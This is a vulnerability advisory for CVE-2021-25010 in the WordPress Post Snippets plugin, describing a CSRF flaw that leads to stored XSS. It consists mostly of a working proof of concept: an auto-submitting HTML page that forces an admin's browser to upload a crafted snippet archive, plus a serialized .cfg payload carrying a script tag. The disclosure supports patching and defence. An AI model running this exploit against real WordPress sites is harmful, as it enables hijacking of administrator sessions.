Post Snippets < 3.1.4 – CSRF to Stored Cross-Site Scripting | CVE 2021-25010

Description

The plugin does not have CSRF check when importing files, allowing attacker to make a logged In admin import arbitrary snippets. Furthermore, imported snippers are not sanitised and escaped, which could lead to Stored Cross-Site Scripting issues

Proof of Concept

<html>
 <body onload="submitRequest()">
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/example.com\/wp-admin\/admin.php?page=post-snippets&tab=tools", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-GB,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------20968233828580032131818997748");
        xhr.withCredentials = true;
        var body = "-----------------------------20968233828580032131818997748\r\n" +
          "Content-Disposition: form-data; name=\"postsnippets_import_file\"; filename=\"post-snippets-export.cfg.zip\"\r\n" +
          "Content-Type: application/zip\r\n" +
          "\r\n" +
          "PK\x03\x04\x14\x00\x08\x00\x08\x00\xbcv{S\x00\x00\x00\x00\x00\x00\x00\x00\xbc\x00\x00\x00\x18\x00 \x00post-snippets-export.cfgUT\r\x00\x07u8\xa2au8\xa2au8\xa2aux\x0b\x00\x01\x04\xf5\x01\x00\x00\x04\x14\x00\x00\x00M\x8d\xcd\x0e\x820\x10\x84\xef\x3e\xc6\x9e\xf4T\xeaO\x88\x03\xf1%\xb8x\xad\xd0\x84&\x84n\xdaE\x8d\x84w\xb7\x8dJ\x3c\xed\xee\xec73\x06\x1a\xb3CQ\x19\x94\x98#N q2X\xaa\"\xf6gP\x1d\xdb\xe0X.f\xb0A\xb6\xea\xda4jW\xab\xaf\x98\xa1#\xe8nB\xcck\x01\xcaCkPg?\x88\xf3\xe3\xdf\'\xe5\xc5\xde\x07i}\x97\n" +
          "n\xa95\xe2\x00\xe2\x9e\x7fW\xf6\x3eX\xecS\xa6\xe0^+T&\xe3\xe8\x98\xad\xaci\xcb\xb2y\x03PK\x07\x08\xc7\x1f\xf9,\x87\x00\x00\x00\xbc\x00\x00\x00PK\x03\x04\x14\x00\x08\x00\x08\x00\xbcv{S\x00\x00\x00\x00\x00\x00\x00\x009\x01\x00\x00#\x00 \x00__MACOSX/._post-snippets-export.cfgUT\r\x00\x07u8\xa2au8\xa2a\x9a8\xa2aux\x0b\x00\x01\x04\xf5\x01\x00\x00\x04\x14\x00\x00\x00c`\x15cg`b`\xf0MLV\xf0\x0fV\x88P\x80\x02\x90\x18\x03\'\x10\x1b100\xb2\x03i \x9f\xd1\x92\x81(\xe0\x18\x12\x12\x04a\x81ul\x01\xe2V4%LPq\x0f\x06\x06\xfe\xe4\xfc\\\xbd\xc4\x82\x82\x9cT\xbd\xdc\xc4\xe4\x1c\x88\xfc\x1f \xb6e`\x10E\xc8\x15\x96&\x16%\xe6\x95d\xe6\xa5203\xf8\xfdv\xb52\xcdtfi\xae? \xc0\xae\x1c\xddH\x9c\xbb\xd0A\xa1\xbe\x81\x81\x85\xa1\xb5\x99a\xa2\x91\xb1\x85\xa9\x81\xb5[fQjZ~\x85\xb5\xb1\x99\xb9\xa1\x89\x89\xab\xa1\xae\x85\xa5\x81\x8b.\x90a\xa6\xebd\xeah\xackb\xeehj\xe2fi\xe8l\xea\xe2\xca\x00\x00PK\x07\x08\xcfh\xf8:\xb1\x00\x00\x009\x01\x00\x00PK\x01\x02\x14\x03\x14\x00\x08\x00\x08\x00\xbcv{S\xc7\x1f\xf9,\x87\x00\x00\x00\xbc\x00\x00\x00\x18\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x81\x00\x00\x00\x00post-snippets-export.cfgUT\r\x00\x07u8\xa2au8\xa2au8\xa2aux\x0b\x00\x01\x04\xf5\x01\x00\x00\x04\x14\x00\x00\x00PK\x01\x02\x14\x03\x14\x00\x08\x00\x08\x00\xbcv{S\xcfh\xf8:\xb1\x00\x00\x009\x01\x00\x00#\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\xb4\x81\xed\x00\x00\x00__MACOSX/._post-snippets-export.cfgUT\r\x00\x07u8\xa2au8\xa2a\x9a8\xa2aux\x0b\x00\x01\x04\xf5\x01\x00\x00\x04\x14\x00\x00\x00PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xd7\x00\x00\x00\x0f\x02\x00\x00\x00\x00\r\n" +
          "-----------------------------20968233828580032131818997748\r\n" +
          "Content-Disposition: form-data; name=\"action\"\r\n" +
          "\r\n" +
          "wp_handle_upload\r\n" +
          "-----------------------------20968233828580032131818997748--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
  </body>
</html>

The XSS will be triggered anywhere in the backend

Or, as admin:

Create a .cfg file with the following content: a:1:{i:0;a:7:{s:5:"title";s:29:"<script>alert(/XSS/)</script>";s:4:"vars";s:0:"";s:11:"description";s:0:"";s:9:"shortcode";b:0;s:3:"php";b:0;s:11:"wptexturize";b:0;s:7:"snippet";s:0:"";}}

Zip it and import it via the plugin's Import feature